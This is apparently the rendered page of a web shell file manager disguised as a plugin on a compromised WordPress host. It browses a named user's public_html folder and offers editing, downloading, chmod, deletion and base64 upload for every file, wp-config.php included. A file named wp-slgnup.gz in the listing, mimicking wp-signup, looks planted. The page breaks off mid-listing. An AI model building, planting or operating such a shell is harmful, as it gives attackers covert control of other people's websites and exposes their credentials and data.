{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-09-14 10:30:41"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2">home2</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2%2Fpablod78">pablod78</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html">public_html</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
                        <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <table class="file-table">
                <thead><tr><th>Name</th><th>Size</th><th>Permissions</th><th>Modified</th><th>Actions</th></tr></thead>
                <tbody id="file-list">
                                            <tr><td colspan="5"><a href="?p=%2Fhome2%2Fpablod78" class="folder-link">📂 Parent Directory</a></td></tr>
                                                                <tr data-name="cgi-bin">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fcgi-bin" class="folder-link">📁 cgi-bin</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-06 19:01</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/cgi-bin','cgi-bin')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/cgi-bin','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/cgi-bin',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="paulo.medeiros">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fpaulo.medeiros" class="folder-link">📁 paulo.medeiros</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-09 23:32</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/paulo.medeiros','paulo.medeiros')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/paulo.medeiros','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/paulo.medeiros',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-admin">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-admin" class="folder-link">📁 wp-admin</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-07 02:04</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-admin','wp-admin')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-admin','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-admin',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-content">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-content" class="folder-link">📁 wp-content</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-20 10:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-content','wp-content')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-content','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-content',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-includes">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-includes" class="folder-link">📁 wp-includes</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-includes','wp-includes')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-includes','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-includes',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                                                <tr data-name="about.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="file-link">📄 about.php</a></td>
                            <td class="size">3.7 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 08:13</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/about.php','about.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/about.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/about.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="default.html">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="file-link">📄 default.html</a></td>
                            <td class="size">246 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-09-12 23:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/default.html','default.html')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/default.html','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/default.html',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="error_log">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="file-link">📄 error_log</a></td>
                            <td class="size">24.1 MB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-09-13 09:54</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/error_log','error_log')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/error_log','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/error_log',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="index.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="file-link">📄 index.php</a></td>
                            <td class="size">405 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-06 19:50</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/index.php','index.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/index.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/index.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="license.txt">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="file-link">📄 license.txt</a></td>
                            <td class="size">19.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/license.txt','license.txt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/license.txt','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/license.txt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="readme.html">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="file-link">📄 readme.html</a></td>
                            <td class="size">7.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/readme.html','readme.html')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/readme.html','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/readme.html',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="robots.txt">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="file-link">📄 robots.txt</a></td>
                            <td class="size">108 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 09:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/robots.txt','robots.txt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/robots.txt','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/robots.txt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-activate.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="file-link">📄 wp-activate.php</a></td>
                            <td class="size">7.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-activate.php','wp-activate.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-activate.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-activate.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-blog-header.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="file-link">📄 wp-blog-header.php</a></td>
                            <td class="size">860 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 09:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-blog-header.php','wp-blog-header.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-blog-header.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-blog-header.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-comments-post.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="file-link">📄 wp-comments-post.php</a></td>
                            <td class="size">2.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2023-06-14 17:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-comments-post.php','wp-comments-post.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-comments-post.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-comments-post.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-config-sample.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="file-link">📄 wp-config-sample.php</a></td>
                            <td class="size">3.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-config-sample.php','wp-config-sample.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-config-sample.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-config-sample.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-config.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="file-link">📄 wp-config.php</a></td>
                            <td class="size">3.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-09 23:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-config.php','wp-config.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-config.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-config.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-cron.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="file-link">📄 wp-cron.php</a></td>
                            <td class="size">5.5 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-07-06 18:51</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-cron.php','wp-cron.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-cron.php','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-cron.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-links-opml.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="file-link">📄 wp-links-opml.php</a></td>
                            <td class="size">2.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-links-opml.php','wp-links-opml.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-links-opml.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-links-opml.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-load.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="file-link">📄 wp-load.php</a></td>
                            <td class="size">3.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-03-11 13:05</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-load.php','wp-load.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-load.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-load.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-login.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="file-link">📄 wp-login.php</a></td>
                            <td class="size">51.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-login.php','wp-login.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-login.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-login.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-mail.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="file-link">📄 wp-mail.php</a></td>
                            <td class="size">8.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-mail.php','wp-mail.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-mail.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-mail.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-settings.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="file-link">📄 wp-settings.php</a></td>
                            <td class="size">32.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-settings.php','wp-settings.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-settings.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-settings.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-signup.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="file-link">📄 wp-signup.php</a></td>
                            <td class="size">34.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-signup.php','wp-signup.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-signup.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-signup.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-slgnup.gz">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="file-link">📄 wp-slgnup.gz</a></td>
                            <td class="size">2.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-18 05:53</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-slgnup.gz','wp-slgnup.gz')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-slgnup.gz','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-slgnup.gz',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-trackback.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="file-link">📄 wp-trackback.php</a></td>
                            <td class="size">5.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-trackback.php','wp-trackback.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-trackback.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-trackback.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="xmlrpc.php">
